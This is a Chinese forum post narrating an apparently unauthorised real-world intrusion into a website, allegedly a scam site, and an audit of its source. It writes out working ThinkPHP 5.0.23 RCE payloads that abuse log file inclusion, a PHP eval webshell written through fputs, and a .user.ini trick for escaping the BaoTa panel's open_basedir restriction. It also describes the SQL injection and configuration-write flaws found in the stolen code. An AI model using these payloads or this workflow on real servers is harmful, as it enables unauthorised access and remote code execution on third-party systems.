记一次实战渗透拿下源码进行审计

zhaorong · 发表于 WEB前端技术 2020-7-13 14:42:27


	本帖最后由 zhaorong 于 2020-7-13 14:43 编辑一、同IP渗透最近朋友发了个站叫我看看打开一看发现是TP3.2.3开发的本想直接利用tp3可以直接查看runtime日志来获取他的后台账号密码的发现并没有开启debug模式所以无法查看到日志信息。随便注册了一个账号进去看有没有注入无果对这个站进行信息收集进行同ip的反查发现7个地址。每个域名又是不同的源码发开的发现一个thinkphp5.0.23的网站可以利用rce 发现无法直接执行代码需要利用runtime日志或者session来进行文件包含获取shell这里利用runtime日志来进行文件包含getshell 先写入日志。利用日志进行包含 post发送： method=__construct&method=get&filter[]=think\__include_file&server[]=phpinf o&get[]=../runtime/log/202007/08.log&x=phpinfo(); 复制代码写入shell： method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../runt ime/log/202007/08.log&c=fputs(fopen('x.php','w'),'<?php eval($_POST[c]);?>')；复制代码成功getshell 由于是宝塔搭建的无法访问其他路径这里可以在新的文件上传一个.user.ini 再在这个文件上传一个一句话就能成功访问其他目录了 .user.ini内容为： open=basedir= 复制代码重新尝试访问www目录成功这样就成功拿下主站的权限的发现主站的代码 fofa查了下有很多使用这套诈骗源码开发的就下载了下来审计了下。二、代码审计发现前台sql注入没有任何过滤由于需要开启debug模式才会生效这个诈骗源码太多注入了就不看其他的了全局查找file_put_contents 发现后台可以写入配置文件getshell 他明明都使用了var_export函数却要添加一个stripslashes去掉转义符构造如下payload 访问文件成功写入phpinfo 三、后记文章写的有点菜望大佬门不要喷我。。。。。。。。。

微信扫一扫 分享朋友圈

记一次实战渗透拿下源码进行审计

微信扫一扫分享朋友圈